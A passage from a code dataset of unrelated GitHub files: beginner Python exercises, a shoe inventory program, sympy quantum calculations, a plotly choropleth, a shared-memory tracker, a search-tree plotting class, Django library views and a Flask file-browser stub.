1\n print(f'#{s} {i} x {int(a/i)} = {a}')\n\nif s == 2:\n print('A megadott szám prím.')\nelse:\n print(f'A megdott számnak {s} osztója van, összegük a {o}')","repo_name":"RisDN/iskola-jegyzetek","sub_path":"Prog/Python/PROG GY/Feladatok/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"hu","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20193249736","text":"a = int(input('Primeiro bimestre: '))\nb = int(input('Segundo bimestre: '))\nc = int(input('Terceiro bimestre: '))\nd = int(input('Quarto bimestre: '))\n\nmedia = (a + b + c + d) / 4\n\n\n\n\n# if a <= 10 and b <= 10 and c <= 10 and d <= 10:\n# print('Média: {}'.format(media))\n# else:\n# print('Foi informado uma nota errada')\n\n\n# a = int(input(\"Entre com o primeiro valor: \"))\n# b = int(input('Entre com o segundo valor: '))\n#\n# resto_a = a % 2\n# resto_b = b % 2\n\n# if resto_a == 0 or not resto_b == 0: --- Inverte a condição!!!\n# print('Foir digitado um número par!')\n# else:\n# print('Nenhum número foi selecionado!')\n\n# if resto_a == 0 or resto_b == 0:\n# print('Foir digitado um número par!')\n# else:\n# print('Nenhum número foi selecionado!')\n\n# if resto == 0:\n# print('Número é par!')\n# else:\n# print('Número é ímpar!')\n\n# a = int(input(\"Primeiro valor\")) // solicita a entrada de dados para o usuário\n# b = int(input(\"Segundo valor\"))\n# c = int(input(\"Terceiro valor\"))\n#\n#\n# if a > b:\n# print('O maior número é {}'.format(a))\n# elif b > a and b > c:\n# print(\"O mairo número é {}\".format(b))\n# else:\n# print(\"O maior número é {}\".format(c))\n# print(\"Final do programa\")","repo_name":"Edubah/EstudandoSnakeRs","sub_path":"Introdução a Python/app_python/Aula3.py","file_name":"Aula3.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36692856829","text":"# Defining shoe class.\nclass Shoe:\n def __init__(self, country, code, product, cost, quantity):\n self.country = country\n self.code = code\n self.product = product\n self.cost = cost\n self.quantity = quantity\n\n def get_cost(self):\n return self.cost\n\n def get_quantity(self):\n return self.quantity\n\n def __str__(self):\n return(f\"Country: {self.country} | Product Code: {self.code} | Shoe: {self.product} | Cost: R{self.cost} | Stock: {self.quantity}\")\n def return_string(self):\n return(f\"{self.country},{self.code},{self.product},{self.cost},{self.quantity}\")\n\n# Blank list.\ninventory_list = []\n\n# Initializes data into list. Runs at the start of program.\ndef read_shoes_data():\n with open(\"inventory.txt\", \"r\") as file:\n next(file)\n shoe_data_list = file.read().splitlines()\n for lines in shoe_data_list:\n lines_list = lines.split(\",\")\n shoe_data = Shoe(lines_list[0], lines_list[1], lines_list[2], lines_list[3], lines_list[4])\n inventory_list.append(shoe_data)\n\n# Add new shoe data. Writes to inventory.txt file.\ndef capture_shoes():\n country_input = input(\"Enter the country: \")\n product_code_input = input(\"Enter the prodcut code: \")\n product_input = input(\"Enter the shoe model: \")\n cost_input = int(input(\"Enter the shoe cost: \"))\n stock_input = int(input(\"Enter the current stock level: \"))\n\n with open(\"inventory.txt\", \"a\") as file:\n file.write(f\"\\n{country_input},{product_code_input},{product_input},{cost_input},{stock_input}\")\n read_shoes_data()\n menu()\n\n# Show all inventory.\ndef view_all():\n for data in inventory_list:\n print(Shoe.__str__(data))\n menu()\n\n# Function to allow users to display the lowest stock in the inventory, and update stock with whatever number they choose\n# Writes data to inventory.txt and re-reads eveything into inventory_list\ndef re_stock():\n list_of_quantities = []\n for shoe in inventory_list:\n quantities = shoe.get_quantity()\n list_of_quantities.append(int(quantities))\n minimum_quantities = min(list_of_quantities)\n\n for shoe in inventory_list:\n if shoe.quantity == str(minimum_quantities):\n print(f\"\"\"The shoe with the lowest stock is:\n{shoe}\"\"\")\n\n while True:\n try:\n user_input = int(input(\"Please enter the amount you would like to restock this shoe by: \"))\n except:\n ValueError\n print(\"Please enter a number!\")\n break\n shoe_qnty_int = int(shoe.quantity)\n shoe_qnty_int += user_input\n shoe_qnty_int = str(shoe_qnty_int)\n shoe.quantity = shoe_qnty_int\n print(f\"\"\"Stock updated for : \n{shoe}\"\"\")\n with open(\"inventory.txt\", \"w\") as file:\n for shoe in inventory_list:\n file.write(shoe.return_string()+\"\\n\")\n menu()\n\n# Function to allow users to search for a show using an SKU code.\ndef search_shoe():\n user_selection = input(\"Enter the product code you would like to search: \")\n search_result = [shoe for shoe in inventory_list if shoe.code == user_selection]\n for data in search_result:\n print(Shoe.__str__(data))\n menu()\n\n\n# Function to display inventory data with total costs calculated.\ndef value_per_item():\n for shoe in inventory_list:\n shoe_inventory_int = int(shoe.quantity)\n shoe_cost_int = int(shoe.cost)\n shoe_total_cost = shoe_cost_int * shoe_inventory_int\n print(f\"{shoe.product} | Quantity: {shoe.quantity} | Cost per item: {shoe.cost} | Total Inventory cost = {shoe_total_cost}\")\n menu()\n\n# Highest quantity function. Reads all data from inventory list and prints highest stock level.\ndef highest_qty():\n list_of_quantities = []\n for shoe in inventory_list:\n quantities = shoe.get_quantity()\n list_of_quantities.append(int(quantities))\n minimum_quantities = max(list_of_quantities)\n\n for shoe in inventory_list:\n if shoe.quantity == str(minimum_quantities):\n print(f\"\"\"The shoe with the highest stock is:\n{shoe}\"\"\")\n print(f\"{shoe.product} should be put on sale!\")\n\n menu()\n\n\n# Defining menu function.\ndef menu():\n print(\"\"\"\n \"\"\")\n print(\"\"\"--- Welcome to Nike International Warehouse Inventory Management System ---\n\n Please select from the following menu options\"\"\")\n\n print(\"\"\"\n1 - Add new stock to manifest\n2 - View all current stock globally\n3 - View the lowest stock levels, and re-stock\n4 - View the highest stock levels\n5 - See stock cost per item\n6 - Search for an Item\n0 - Exit program\"\"\")\n\n while True:\n try:\n user_selection = int(input(\"Selection: \"))\n except:\n ValueError\n print(\"Please enter a valid number.\")\n if user_selection == 1:\n capture_shoes()\n elif user_selection == 2:\n view_all()\n elif user_selection == 3:\n re_stock()\n elif user_selection == 4:\n highest_qty()\n elif user_selection == 5:\n value_per_item()\n elif user_selection == 6:\n search_shoe()\n elif user_selection == 0:\n print(\"Goodbye!\")\n exit()\n else:\n print(\"Please enter a valid selection.\")\n\n\n# Initializing Data!\nread_shoes_data()\n\n# Call menu function.\nmenu()\n","repo_name":"tjshuff/Inventory","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27853834341","text":"import sympy as sp\n\nA, x, L = sp.symbols('A, x, L')\np = A*x*(L-x)\np.subs(A, 112).subs(L, 10)\n\nsp.plot(p.subs(A, 1).subs(L, 1), (x, 0, 1), line_color='g')\nsp.integrate(p, x)\nrst = sp.integrate(p, (x, 0, L))\nrst\n\nM = sp.symbols('M')\nsp.solve(rst-M, A)\n\nx, e, t = sp.symbols('x, e, t', real=True)\nh_bar, L, m = sp.symbols('\\\\hbar, L, m', real=True, positive=True)\nn = sp.symbols('n', integer=True, positive=True)\nEn = (n*sp.pi*h_bar/L)**2/(2*m)\nhaha = sp.sqrt(2/L)*sp.sin(((n*sp.pi)/L)*x)\nwowo = sp.exp(-sp.I*En*t/h_bar)\np = abs(wowo*haha)**2\np\nsp.integrate(p, (x, 0, L))\n\nfor i in range(1, 10):\n sp.plot(p.subs(L, 1).subs(n, i).subs(t, 1).subs(m, 1), (x, 0, 1))\n\nsp.re(wowo*haha).subs(L, 1).subs(n, 1).subs(t, 1).subs(m, 1)\nfor i in range(1, 100):\n sp.plot(sp.re(wowo*haha).subs(L, 1).subs(n, 1).subs(t, 0.01*i).subs(m, 1).subs(h_bar, 1), (x, 0, 1), ylim=(-2, 2))\n\nlower = 1/8*L\nupper = 1/4*L\n\nfor i in range(1, 6):\n rst = sp.integrate(p.subs(L, 1).subs(n, i).subs(t, 1).subs(m, 1),\n (x,\n lower.subs(L, 1),\n upper.subs(L, 1)))\n prob = sp.N(rst)\n print(f\"{prob}\")\n","repo_name":"Neoanarika/SPS2173-Atom2Molecules-Python-Code","sub_path":"IS6.py","file_name":"IS6.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39973204403","text":"import pandas as pd\r\nimport numpy as np\r\nimport cufflinks as cf\r\ncf.go_offline()\r\nimport plotly.graph_objs as go\r\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\r\ndf=pd.read_csv('gdp-ppp-csv-.csv')\r\ndata=dict(type='choropleth',\r\n locations=df['Economy'],\r\n z=df['(millions of international dollars)'],\r\n text=df['Economy'],\r\n colorbar={'title':'GDP in Millions'})\r\nlayout = dict(\r\n title = '2017 Global GDP',\r\n geo = dict(\r\n showframe = False,\r\n projection = dict(type = 'azimuthal equal area')\r\n ))\r\nchoromap3 = go.Figure(data = [data],layout = layout)\r\niplot(choromap3)","repo_name":"Subhankarcodes/Choropleth","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8385179917","text":"\"\"\"This module have to solve the problems\n - Add/remove shared memory => use tracker and simple queue\n - synchronize shared memory\n - shared memory pointer ?\n - Dict/list shared memory structure ?\n - dynamic length list/dict ?\n - pad/unpad name from buffer ? => unpad object, get name from buffer\n\"\"\"\nimport multiprocessing\nimport pickle\nimport queue\nimport time\nimport typing as t\nfrom multiprocessing import shared_memory\n\nfrom ring_buffer.services import padding_name as pad\n\n\"\"\"\nDynamic shared memory list/dict:\n1. Linkedlist which all shared memory name is pointers in node\n2. Dict with key is the shared memory name => loop over a dict ? \nlimit the length of name ?\n\"\"\"\n\n\nclass SharedMemoryTracker:\n \"\"\"Shared Memory tracker\n - consume a queue => add/remove shared memory name\n - save all memory in a dict\n - shutdown => close all memory\n \"\"\"\n\n def __init__(\n self,\n sync_queue: multiprocessing.SimpleQueue,\n interval: float = 0.005\n ):\n self._track_map: t.Dict[str, shared_memory.SharedMemory] = {}\n self._queue = sync_queue\n self._stop = False\n self._interval = interval\n\n @property\n def queue(self) -> multiprocessing.SimpleQueue:\n return self._queue\n\n @property\n def is_stop(self) -> bool:\n return self._stop\n\n def stop(self):\n self._stop = False\n\n @staticmethod\n def _new_key_value(key: str, value):\n if not isinstance(key, str):\n raise ValueError(f'key must be string type, receive {key}')\n # calculate the size of value\n value_bytes = pickle.dumps(value)\n smm = shared_memory.SharedMemory(\n name=key,\n size=len(value_bytes),\n create=True,\n )\n pad.set_name(smm.buf, value_bytes)\n return smm\n\n def _signal_to_action(self, _signal: int, key: str, value):\n if _signal == -1:\n smm = self._track_map.pop(key)\n smm.unlink()\n elif _signal == 1:\n self._track_map[key] = self._new_key_value(key, value)\n elif _signal == 0:\n self.shutdown()\n\n def set_change(\n self,\n _signal: int,\n key: str,\n value: shared_memory.SharedMemory\n ):\n self._signal_to_action(_signal, key, value)\n\n def notify_change(\n self,\n _signal: int,\n key: str,\n value: shared_memory.SharedMemory\n ):\n self._queue.put((_signal, key, value))\n\n def flush(self):\n while not self._queue.empty():\n _signal, key, value = self._queue.get()\n self._signal_to_action(_signal, key, value)\n if _signal == 0:\n # signal to stop the manager\n return False\n return True\n\n def run(self):\n self._stop = False\n while not self._stop:\n should_continue = self.flush()\n if not should_continue:\n break\n time.sleep(self._interval)\n\n def values(self):\n return self._track_map.values()\n\n def items(self):\n return self._track_map.items()\n\n def shutdown(self):\n self._stop = True\n # remove all shared memories\n for v in self._track_map.values():\n v.unlink()\n\n\ndef test_add_remove_to_tracker(smt: SharedMemoryTracker):\n smt.notify_change(1, 'test1', 100)\n time.sleep(1)\n smt.notify_change(1, 'test2', \"i liked it\")\n smt.notify_change(1, 'test3', \"i don't like it\")\n time.sleep(1)\n smt.notify_change(-1, 'test1', None)\n time.sleep(1)\n smt.notify_change(0, None, None)\n\n\ndef test_shared_memory_tracker():\n simple_queue = multiprocessing.SimpleQueue()\n smt = SharedMemoryTracker(simple_queue)\n # create a process which put change in to smt\n process = multiprocessing.Process(\n name='test_tracker',\n target=test_add_remove_to_tracker,\n args=(smt,),\n daemon=True\n )\n process.start()\n\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 1\n smt.flush()\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 3\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 2\n # smt.shutdown()\n time.sleep(3)\n smt.flush()\n\n\nif __name__ == '__main__':\n test_shared_memory_tracker()\n","repo_name":"minhtuan221/python-ring-buffer","sub_path":"ring_buffer/services/shared_mem_tracker.py","file_name":"shared_mem_tracker.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32306701541","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is the module for search tree visualization\n\nAuthor: Xian Lai\nDate: Sep.14, 2017\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\nimport math\n\nsm_font = {'fontsize':13, 'fontname':'Arial'}\nmd_font = {'fontsize':17, 'fontname':'Arial', 'fontweight':'bold'}\nlg_font = {'fontsize':25, 'fontname':'Arial', 'fontweight':'bold'}\n\ngrey = {'light':'#efefef', 'median':'#aaaaaa', 'dark':'#282828'}\ndiscColor = {'blue':'#448afc', 'red':'#ed6a6a', 'green':'#80f442'}\ncm = {'light':plt.get_cmap('RdYlGn'), 'dark':plt.get_cmap('cool')}\ngreen = {'light':'#d4f442' , 'dark':'#2dbc32'}\n\n\nclass TreeVisual():\n \n \"\"\" This class implements the methods to parse the search tree to get plot\n data and the methods to plot the tree based on the attributes of its nodes\n like whether is goal node or whether is path. \n \"\"\"\n\n def __init__(self, diameter=20, background='dark'):\n \"\"\" set the fig size and background color.\n \"\"\"\n # set up the color of background, edges, nodes and text\n if background == 'dark':\n self.bgc = grey['dark']\n self.c = grey['light']\n self.cm = cm['light']\n self.green = green['light']\n else:\n self.bgc = grey['light']\n self.c = grey['dark']\n self.cm = cm['dark']\n self.green = green['dark']\n plt.rcParams['axes.facecolor'] = self.bgc\n plt.rcParams['figure.facecolor'] = self.bgc\n\n self.fig = plt.figure(figsize=(diameter, diameter))\n self.ax = self.fig.add_subplot(111, projection='polar')\n self.radius = diameter/2\n self._set_polarAxParam(self.ax)\n\n\n @staticmethod\n def show():\n plt.show()\n\n\n def save(self, path='search_tree.png'):\n \"\"\" Save the fig to file. You can directly specify the format in the \n file name. And you can specify the dpi and bbox_inches. \n \n inputs:\n -------\n - path: The path you want to save the file to.\n \"\"\"\n self.fig.savefig(path, dpi=None, bbox_inches='tight')\n\n\n def plot_tree(self, tree, paths, title='search tree', ls='-', a=0.5, \n show=True):\n \"\"\" plot the tree in polar projection with correct spacing and:\n - initState marked in green text\n - goalState marked in green text\n - path leads to goal node marked in green\n - nodes colored by their pathcost\n\n inputs:\n -------\n - tree: The search tree in form described in TreeSearch.py\n - paths: The collection of paths found.\n - title: title of the fig.\n - ls: line style\n - a: alpha\n - show: whether to show the plot.\n \"\"\"\n self.tree = tree\n self.pathNodes = self._flatten(paths)\n if self.pathNodes: self.goal = paths[0][-1]['state']\n else: self.goal = \"Not Found\"\n\n # set up spacing:\n vDists = [x**1.5 for x in range(len(self.tree))]\n self.vDist = [self.radius * 1500 * x / max(vDists) for x in vDists]\n self.hDist = [0] + [600/radius for radius in self.vDist[1:]]\n\n # parse the tree and plot\n self._parse_tree()\n\n for gnrt in range(len(self.parsedTree)):\n for cluster in self.parsedTree[gnrt]:\n for sibling in cluster:\n self._plot_node(sibling, ls=ls, textColor=self.c, a=a)\n if gnrt > 0:\n self._plot_edge(\n sibling, gnrt, ls=ls, edgeColor=self.c, a=a\n )\n\n self._set_axTitle(self.ax, title)\n if show: plt.show()\n\n\n def _plot_edge(self, node, gnrtIdx, edgeColor, ls, a):\n \"\"\" plot the edge from given node to its parent node with given color, \n line style, and alpha. If this edge is on path, then change the color\n to green.\n\n inputs:\n -------\n - node: The given node which is the children end of edge\n - gnrtIdx: The generation index of given node\n - edgeColor: the color of edge\n - ls: line style\n - a: alpha\n \"\"\"\n paClstIdx = node['parent'][0] # cluster index of parent node\n paSiblIdx = node['parent'][1] # sibling index of parent node\n parent = self.parsedTree[gnrtIdx-1][paClstIdx][paSiblIdx]\n edgeXs = (node['x'], parent['x'])\n edgeYs = (node['y'], parent['y'])\n\n if node['isPath'] == True: edgeColor=self.green\n self.ax.plot(edgeXs, edgeYs, c=edgeColor, ls=ls, alpha=a, lw=1)\n\n\n def _plot_node(self, node, textColor, ls, a):\n \"\"\" plot the given node colored by its path cost. And plot its text \n label with default text color and alpha. If this node is goal node, \n plot the text in green.\n\n inputs:\n -------\n - node: The node to be plotted.\n - textColor: the default color of text\n - ls: line style\n - a: alpha\n \"\"\"\n nodeColor = self.cm(1-node['z'])\n if node['nodeText'] == self.goal: textColor = self.green\n\n # if the text in on the left side of the plot, it's upside down. So \n # rotate it by 180 degree\n textRotation = math.degrees(node['x'])\n if (textRotation > 90) and (textRotation < 270): \n textRotation = textRotation - 180\n\n x_text = node['x']\n y_text = node['y'] + 800 # offset labels outward away from node\n content = node['nodeText']\n param = {\n 'color':textColor, 'rotation':textRotation, 'alpha':a, \n 'ha':'center', 'va':'center'\n }\n \n self.ax.plot(node['x'], node['y'], 'o', c=nodeColor, alpha=a)\n self.ax.text(x_text, y_text, content, **param)\n\n\n def _set_polarAxParam(self, ax):\n \"\"\" set the parameters of polar axes: turn off the axes ticks, spines\n and grid.\n \"\"\"\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.spines[\"polar\"].set_visible(False)\n ax.grid(False)\n \n\n def _tight_layout(self):\n self.fig.tight_layout()\n\n\n def _set_figTitle(self, title):\n self.fig.suptitle(title, c=grey['light'], **lg_font) \n\n\n def _set_axTitle(self, ax, title):\n if self.radius < 12: font = md_font\n else: font = lg_font\n ax.set_title(title, color=self.c, **font)\n\n\n #----------------------------- PARSE TREE --------------------------------\n def _parse_tree(self):\n \"\"\" To plot the nodes, edges and corresponding text labels of search \n tree, we need to parse the tree data and extract information like the\n x, y values of each node, their parent node etc.\n\n The parsed result will in form of:\n parsedTree = [gnrt_0, gnrt_1, ...]\n gnrt_# = [clst_0, clst_1, ...]\n clst_# = [sibl_0, sibl_1, ...]\n sibl_# = {\n 'x' : x value of this node in plot, \n 'y' : y value of this node in plot which is the level of this node\n 'z' : color of this node which is the path cost up to this node\n 'nodeText': the state of this node\n 'parent' : the peerIdx of parent\n 'edgeText': the name of edge which is the previous action\n 'isPath' : if this edge is part of path, 2xlinewidth\n }\n \"\"\"\n pathCosts = self._extract_values(self.tree, 'pathCost')\n maxZ = max(pathCosts)\n clstEndX = -2 # default end of cluster\n\n self.parsedTree = [] # initialize the parsedTree\n\n # start parsing from the root layer by layer\n for gnrt in self.tree:\n # append an empty list as current generation\n self.parsedTree.append([]) \n for clst in gnrt:\n # append an empty list to the current layer as current cluster\n self.parsedTree[-1].append([]) \n # fix the starting and ending x values of current cluster.\n clstStartX, clstEndX = self._parse_clstX(clst, clstEndX)\n # adding desired information to each node in the cluster.\n for sibl in clst:\n gnrtIdx, siblIdx = sibl['gnrt'], sibl['sibl']\n parsedNode = {\n 'x':clstStartX + siblIdx * self.hDist[gnrtIdx],\n 'y':self.vDist[gnrtIdx], # y is its layer\n 'z':sibl['pathCost']/maxZ, # normalized pathCost\n 'nodeText':sibl['state'],\n 'children':sibl['children'],\n 'parent':sibl['parent'],\n 'edgeText':sibl['prevAction'],\n 'isPath':self._isPath(sibl),\n 'clst':sibl['clst'],\n 'gnrt':sibl['gnrt'],\n 'sibl':sibl['sibl']\n }\n self.parsedTree[-1][-1].append(parsedNode)\n\n # scale the x values of tree so it's within 2*pi\n self._normalize_tree()\n\n \n def _parse_clstX(self, clst, l_clstEndX):\n \"\"\" Calculate the starting and ending x values of given cluster. But \n in order to plot a nice looking tree, we can't simply use the order of \n nodes' cluster indices and sibling indices as their x values. Instead, \n we have to add correct amount of spaces between nodes and clusters so:\n\n - All the parent nodes will be on the center of their childrens.\n - Neighboring clusters will be separated by a one-unit gap.\n - Nodes belong to same cluster will stay together.\n\n So we need to consider the x values of given cluster's neighbors and \n parent.\n\n inputs:\n -------\n - cluster: The current cluster to calculate x values.\n - l_clstEndX: The ending x value of last cluster in the same layer.\n\n output:\n -------\n - clstStartX: The starting x value of current cluster.\n - clstEndX: The ending x value of current cluster.\n \"\"\"\n node = clst[0]\n gnrtIdx, clstIdx, paIdx = node['gnrt'], node['clst'], node['parent']\n clstSize = len(clst) - 1\n\n # if currently at root, both clstStartX and clstEndX are just 0\n if gnrtIdx == 0: clstStartX, clstEndX = 0, 0\n\n # else, every cluster has a parent, the center of cluster equals to \n # parent's x value. And the starting and ending x values are fixed.\n else:\n parentX = self.parsedTree[gnrtIdx-1][paIdx[0]][paIdx[1]]['x']\n clstStartX = parentX - clstSize*self.hDist[gnrtIdx]/2\n clstEndX = parentX + clstSize*self.hDist[gnrtIdx]/2\n\n # but we still need to make sure the current cluster is not over-\n # lapping with last cluster in the same generation. If current \n # cluster is the first one in current generation, there won't be \n # overlaping. Otherwise, we should check whether overlapping exist\n # by comparing l_clstEndX + 2*unit with clstStartX(we add 2 units \n # here instead of 1 is because we want to leave the 1 unit gap \n # between clusters). If clstStartX is greater then we are safe, \n # otherwise we should shift the cluster onward by overlapping \n # amount and adjust the x values of all nodes affected by this \n # shift in the previous generations(because we still want to keep \n # parent on the center of children cluster).\n if clstIdx != 0:\n shift = (l_clstEndX + 2*self.hDist[gnrtIdx]) - clstStartX\n if shift > 0:\n clstStartX += shift; clstEndX += shift\n self._adjust_upward(\n gnrtIdx, clstIdx, paIdx, clstStartX, clstEndX\n )\n\n return clstStartX, clstEndX\n\n\n def _adjust_upward(self, gnrtIdx, clstIdx, paIdx, clstStartX, clstEndX):\n \"\"\" if current expanding cluster is shifted, we need to adjust upward\n to update all the nodes being affected. \n\n Assuming the parent, parent of parent and so forth of current cluster \n are called direct relatives. Only the nodes following(has bigger \n clstIdx) direct relatives in each higher generations are affected by \n the shift.\n\n inputs:\n -------\n - gnrtIdx: The generation index of current cluster\n - clstIdx: The cluster index of current cluster\n - paIdx: [parent's cluster index, parent's sibling index]\n - clstStartX: the starting x value of shifted current cluster\n - clstEndX: the ending x value of shifted current cluster\n \"\"\"\n # find the clstIdx and siblIdx of direct relatives in each generation\n dirClst = [paIdx[0]] # cluster indices of direct relatives\n dirSibl = [paIdx[1]] # sibling indices of direct relatives\n for generation in self.tree[gnrtIdx-1:1:-1]:\n prnt = generation[dirClst[-1]][dirSibl[-1]]['parent']\n dirClst.append(prnt[0])\n dirSibl.append(prnt[1])\n\n # update generation gnrtIdx - 1, in this generation, all nodes follow-\n # ing and including parent of current cluster simply should shift by \n # the amount of (clstStartX + clstEndX)/2 - dir_parent['x'].\n dir_parent = self.parsedTree[-2][dirClst[0]][dirSibl[0]]\n shift = (clstStartX + clstEndX)/2 - dir_parent['x']\n\n # update nodes following parent in the parent's cluster\n for sibl in self.parsedTree[-2][dirClst[0]][dirSibl[0]:]:\n sibl['x'] += shift\n\n # update nodes in the following cluster\n for clst in self.parsedTree[-2][dirClst[0]+1:]:\n for sibl in clst:\n sibl['x'] += shift\n\n # update all generations upward except root, from gnrtIdx - 2 to 1.\n # because this is polar plot, the root node is always in the center.\n for i, gnrt in enumerate(self.parsedTree[gnrtIdx-2:0:-1], start=1):\n\n # For the direct relative in each generation, it should be shift \n # onto the center of their children nodes. And we keep record of \n # the shift distance.\n dir_relative = gnrt[dirClst[i]][dirSibl[i]]\n original = deepcopy(dir_relative['x'])\n dir_relative['x'] = self._find_childrenCenter(dir_relative)\n shift = dir_relative['x'] - original\n\n # For the nodes in the direct relative's cluster following direct \n # relative, we compare the x value after shift and the x value of\n # the center of their children nodes. The correct x value should \n # be the greater one. And we keep track of the shift distance \n # because it will affect the following siblings and clusters.\n for sibl in gnrt[dirClst[i]][dirSibl[i]+1:]:\n shift = self._compare_shiftCenter(sibl, shift)\n\n # For the nodes in the following clusters\n for clst in gnrt[dirClst[i]+1:]:\n for sibl in clst:\n shift = self._compare_shiftCenter(sibl, shift)\n\n\n def _compare_shiftCenter(self, node, shift):\n \"\"\" compare the shifted distance and the center of children cluster of\n given node, assign the larger one as the new x value of given node and \n return the shifted amount.\n \"\"\"\n center = self._find_childrenCenter(node)\n original = deepcopy(node['x'])\n shifted = original + shift\n node['x'] = max(center, shifted)\n shift = node['x'] - original\n return shift\n\n\n def _find_childrenCenter(self, node):\n \"\"\" Find the center of children cluster of gievn node if it has child-\n ren nodes.\n \"\"\"\n # if it has no children, then return a negative value\n if node['children'] == None: return -999\n # else, find the children cluster, take the average of x values of \n # this cluster's first and last nodes.\n else:\n children = self.parsedTree[node['gnrt']+1][node['children']]\n clstStartX = children[0]['x']\n clstEndX = children[-1]['x']\n return (clstStartX + clstEndX)/2\n\n\n def _normalize_tree(self):\n \"\"\" scale the x values of tree if the maximal x value of any layer \n exceed 5/6 pi. \n \"\"\"\n X = self._extract_values(self.parsedTree, 'x')\n minX, maxX = min(X), max(X)\n if maxX >= 5/6 * math.pi:\n scale = 2*math.pi / (maxX - minX + 0.05)\n for gnrt in self.parsedTree:\n for clst in gnrt:\n for sibl in clst:\n sibl['x'] *= scale\n\n\n def _flatten(self, nestedList):\n \"\"\" given a list, possibly nested to any level, return it flattened.\n \"\"\"\n flatten = []\n for item in nestedList:\n # if any element is a list, recursively apply this function.\n if type(item) == list: flatten.extend(self._flatten(item))\n else: flatten.append(item)\n return flatten\n\n\n def _isPath(self, node):\n \"\"\" check whether the given node is on the path to the goal node. To \n do this, we simply check whether this node is in the path collection.\n \"\"\"\n for pathNode in self.pathNodes: \n if node == pathNode: return True\n return False\n\n\n def _extract_values(self, nested, key):\n \"\"\" extract the values of specified key from all dictionaries in a \n nested list. We use this function to extract values of certain \n attributes of all nodes in a tree or generation.\n\n inputs:\n -------\n - nested: A nested list of dictionaries. \n - key: The key of interest.\n \"\"\"\n values = [node[key] for node in self._flatten(nested)]\n return values\n\n\n","repo_name":"Xianlai/Tree-Search-and-Visualization","sub_path":"tree_search_plot/tree_search_plot/TreeVisual.py","file_name":"TreeVisual.py","file_ext":"py","file_size_in_byte":17981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41074412315","text":"from multiprocessing import context\nfrom django.urls import reverse_lazy, reverse\nimport os\nfrom urllib import request, response\nfrom django.conf import settings\nfrom django.shortcuts import render,redirect, get_object_or_404\nfrom . models import *\nfrom . forms import CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse,JsonResponse\nfrom django.template.loader import render_to_string\n\n\n# from account import forms\n\n# Create your views here.\n\n\n\ndef libraries(request):\n all_libraries = Post.objects.all()\n return render(request, 'product-page.html', {'all_libraries' : all_libraries})\n\ndef library_preview(request, preview):\n library = Post.objects.get(preview=preview)\n return render(request, 'library_preview.html', {\"library\" : library})\n\ndef library_preview(request, preview):\n library = Post.objects.get(preview=preview)\n return render(request, 'library_preview.html', {\"library\" : library})\n\n\n\n#library_slug(request):\n\n\ndef library_detail(request, slug):\n library = Post.objects.get(slug=slug)\n is_liked = False\n if library.likes.filter(id=request.user.id).exists(): \n is_liked = True \n \n if request.method == 'POST':\n cf = CommentForm(request.POST)\n if cf.is_valid(): \n content = request.POST.get('content')\n comment = Comment.objects.create(library = library, user = request.user, content = content)\n comment.save()\n return redirect('library_detail', slug=library.slug)\n else: \n\n cf = CommentForm()\n context= { \n 'comment_form':cf, \n 'library' : library,\n 'is_liked':is_liked, \n 'total_likes': library.total_likes(),\n \n } \n return render(request, 'library_detail.html', context)\n\n\ndef download(request,path):\n file_path =os.path.join(settings.MEDIA_ROOT,path)\n if os.path.exists(file_path):\n with open(file_path,'rb')as fh:\n #response = HttpResponse(fh.read(),content_type=\"application/octet-stream\")\n response = HttpResponse(mimetype='application/adminupload')\n response['Content-Disposition']='inline;filename'+os.path.basename(file_path)\n return response\n raise HttpResponse(\"File not found\")\n \n\n\ndef like_library(request):\n library = get_object_or_404(Post, id=request.POST.get('library_id'))\n is_liked = False\n if library.likes.filter(id = request.user.id).exists():\n library.likes.remove(request.user)\n is_liked = False\n else:\n library.likes.add(request.user)\n is_liked = True\n\n context= {\n 'is_liked':is_liked, \n 'total_likes': library.total_likes(),\n 'library' : library,\n } \n \n if request.is_ajax():\n html = render_to_string('like_section.html', context, request=request) \n context = {'form': html} \n return JsonResponse(context)\n\n\n\n","repo_name":"zuri-training/auth-wiki-team7","sub_path":"library/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"7133964164","text":"from flask import Flask, render_template, request\nfrom flask_restful import Api, Resource, abort\nimport os\nfrom classes import DirectoryInfo, FileInformation, SettingsAllowedPaths\n\napp = Flask(__name__,\n template_folder='.',\n static_folder=\".\",\n static_url_path=\"\")\n\napi = Api(app)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\napi.add_resource(SettingsAllowedPaths.SettingsAllowedPaths, '/settings')\napi.add_resource(DirectoryInfo.DirectoryInfo, '/directory')\napi.add_resource(FileInformation.FileInformation, '/file')\n\nif __name__ == \"__main__\":\n app.run(host=\"localhost\", port=\"7777\", 